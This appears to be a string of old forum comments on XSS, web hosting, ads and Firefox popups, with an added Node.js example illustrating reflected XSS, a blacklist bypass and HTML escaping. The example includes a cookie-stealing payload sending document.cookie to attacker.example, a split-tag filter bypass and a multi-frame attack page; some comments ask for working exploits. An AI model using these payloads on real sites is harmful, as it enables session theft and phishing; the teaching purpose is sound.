Well, with XSS, you don't have to "break into" anything to discover the vulnerability. All you do is throw the web servers a few strings and see what they send back.
I've found dozens of XSS problems on sites, and have made news for one on Citibank. I've only received a few threatening legal letters from companies.
Uhm, yeah, that is still a problem though. Have you allowed Google.com? Have you allowed other sites that you trust, but that may still have XSS problems? When the script is executed, it's done so under the google.com domain. This is the main problem with XSS.
What needs to happen is that sites need to use LESS JavaScript, and should degrade gracefully when JS is disabled. Unfortunately, with AJAX, it's more common than ever.
It's easy to force a user to go to a URL. If you go to a website, they can include a frame and load the error.
They can even go to multiple problems at the same time. If this problem were more prevalent, a hacker could craft a page that steals ALL your online logins/cookies/etc. from any site that had the problem. They would just need to craft a page with multiple framesets that load up all the vulnerable pages.
XSS is also making news because it's being used by phishers to forge stuff from the target domain. All the anti-phishing stuff relies on which domain a link is going to, but in a sense, XSS allows phishers to put their own page (i.e. a fake login) on the target domain! It is very much a problem for any site that deals with personal information or has trusted content.
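As an added example, not code from the original thread or from any of the posters, the Node.js script below shows the three points made above in running code: a reflected parameter that executes in the vulnerable site's own origin with access to document.cookie (and could just as well rewrite the page into a fake login form), a blacklist filter that an "encoded" or split payload walks straight through, and output encoding as the fix that actually holds. The hostnames (victim.example, attacker.example), the parameter name, the page template and every payload are constructed for illustration and do not describe any real site.

```javascript
// Added example, not code from the original thread. Hostnames, parameters
// and payloads below are constructed for illustration.

// Vulnerable pattern: reflect a query parameter straight into the HTML.
// Whatever the attacker put in the URL now runs in this site's origin,
// with access to its cookies and DOM (it can rewrite the page into a fake
// login form, which is the phishing angle).
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for ${query}</h1></body></html>`;
}

// A common "fix" of the era: delete <script> tags. It is a blacklist, so
// any construct it did not anticipate goes straight through.
function naiveStripScript(query) {
  return query.replace(/<\/?script>/gi, "");
}

function renderSearchNaive(query) {
  return renderSearchVulnerable(naiveStripScript(query));
}

// The real fix: encode every character that has meaning in an HTML text
// context, so user input can never open a tag or an attribute.
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchSafe(query) {
  return `<html><body><h1>Results for ${htmlEscape(query)}</h1></body></html>`;
}

// Read a parameter the way a server framework does, percent-decoding it.
// This is the "encoded XSS" case: the link looks like noise to a human,
// but "%3C" is "<" again by the time it reaches the template.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Rough oracle for "does this response execute attacker-controlled script?":
// a literal <script> tag, or a literal tag carrying an on* event handler.
// Escaped text (&lt;img ... onerror=...) has no literal '<' and does not match.
function containsActiveScript(html) {
  return /<script[\s>]/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed attacker link: the payload is an <img> whose onerror handler
// ships document.cookie to the attacker, fully URL-encoded in the link.
const COOKIE_THEFT =
  "<img src=x onerror=\"new Image().src='http://attacker.example/c?'+document.cookie\">";
const ATTACK_URL =
  "http://victim.example/search?q=" + encodeURIComponent(COOKIE_THEFT);

// Payload that walks through the <script>-stripping blacklist: removing the
// inner tags leaves a well-formed <script> tag behind.
const SPLIT_SCRIPT_PAYLOAD = "<scr<script>ipt>alert(1)</scr</script>ipt>";

// The "page with multiple framesets" from the thread: one frame per
// vulnerable site, so a single visit fires every payload at once.
function attackerLandingPage(attackUrls) {
  const frames = attackUrls.map((u) => `<iframe src="${htmlEscape(u)}"></iframe>`);
  return `<html><body>${frames.join("")}</body></html>`;
}

function demo() {
  const q = queryParam(ATTACK_URL, "q");
  return {
    decodedPayload: q,
    vulnerableRunsScript: containsActiveScript(renderSearchVulnerable(q)),
    naiveFilterBypassed: containsActiveScript(renderSearchNaive(SPLIT_SCRIPT_PAYLOAD)),
    safeRunsScript: containsActiveScript(renderSearchSafe(q)),
    safeRunsSplitPayload: containsActiveScript(renderSearchSafe(SPLIT_SCRIPT_PAYLOAD)),
  };
}

console.log(demo());
```

Run it with `node` and compare the three renderers on the same input: the vulnerable and naively filtered versions both end up with a live tag in the response, the escaped version never does, no matter how the payload was encoded or split, because escaping acts on the output context rather than trying to recognise attacks in the input.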
Does anyone have the real post that hasn't been mangled by the mailing list?
What are these characters that they used?
Does anyone have a working exploit of this type (encoded xss) on another site?
They've had others in the past, but were quick to fix them. They have even sent t-shirts as thanks for the help.
Other sites are not so friendly or fast. This site shows active security holes in various sites that have gone unresolved (CSS, insecure logins, etc.).
I agree with much of this post. Once split up, you can also easily see where you need to grow. For one of my growing sites that was very image- and database-dependent, I used 1 primary machine, 2 database machines and 6 image/static content machines. The image servers were all just mirrors of the main site, and put into round-robin DNS, which provides pretty good, but not perfect, load balancing. I didn't have a logging machine, but I did have another machine for backups and other things like email.
People often try to set up more complex ways of handling things, but oftentimes it's an overreaction.
They have been using graphical image ads for a long time for their own products.
I currently see this at the bottom of my search results.
http://www.google.com/images/firefox_toolbar.gif
They also have been using image ads in their AdSense network for ages. They also put graphical themes in the text ads for the holidays: just search for Christmas.
I don't see why anyone can be upset with this minor change.
Well, it was sort of a joke... But really, isn't it only a matter of time until cell phones and PDAs catch up and can display most pages normally? I think that changing the site for small layouts is a waste for most sites at this time. Of course, a well-engineered site would be flexible enough to support different designs, but the extensive transformations necessary for cell phones are just too costly for most sites.
Pretty much all the websites work about the same on my mobile wireless laptop. Why would people need to modify how they make the sites for them to work right?
Were you limiting your AdWords campaign to just Google search, or were you including content websites?
It's easy to limit the AdWords campaign so that there is no motivation for click fraud.
You could add a local caching proxy server and/or set browsers to cache longer to reduce bandwidth. Have you done an analysis on how much of the traffic is people just pulling up the same pages?
Well, there are a few references to you on Slashdot.
Searching ZabaSearch for "Alexander Case" finds only a few people, but none of them in OR. Are you using an assumed name or location online?
Why does everyone get this wrong? The RIAA is going after people SHARING music online, not the downloaders directly. How could Slashdot get this wrong? How come everyone here has gotten it wrong? The RIAA can only track those people sharing music, or downloading directly from them. They are going after the people sharing music.
I've even tried completely wiping out my config and seeing stuff with default settings. Ugh! I still get pops, but I also get those annoying plugin install notices (which I've turned off).
Yes, I go to those sites all the time. The point is that the most untrusted of sites have breached the boundaries that are supposed to be set up in the browser. I don't like the fact that Firefox can't control JavaScript. I don't like the FACT that IE is better than Firefox at blocking popups.
If you can't trust Firefox to block popups, can you trust it for banking and other critical stuff?
I can't stand it; since upgrading to 1.5, I've gotten MORE popups. Even with 1.1, I got more popups in Firefox than I do in IE... and no, it's not Flash-based popups, because I can't even get that installed. 2 big thumbs down for Firefox 1.5. How is it that the coders of Firefox can't control the freaking Open Window function? Just disable it!!! I don't want more windows!
Do you know of any XSS bugs in Yahoo?
Why doesn't some company start up an open e-voting machine business?
The Amazon search engine a9.com pays pi/2% off on most Amazon purchases. It's a nice plus, but hasn't made me switch from Google.
$0.99 * # of downloads = total value (obviously though, only a % goes to the music company, but still)
They automatically make more money on more popular songs already. It doesn't need to be exponential growth!!!
So, fresh install, fresh configs... pops galore.
Hmm, interesting, considering I just installed it today. Are you on Linux?
Example site: http://www.dollchick.com/
b. I run ads on my own sites from there, so I really can't ban the site.
c. I see ads coming from Fastclick, Casale, Tribal Fusion. I think they've all figured it out.
d. It seems like a JavaScript security hole to me. Why don't you tell the Firefox engineers about the problem?
I do have the popup blocker enabled.
I'm on Linux; it is NOT an automated process. They don't even have a Firefox installer.
I do have the popup blocker enabled.
b. If that did work, why wouldn't that be the setting that is set by the "block popup windows" option in user settings?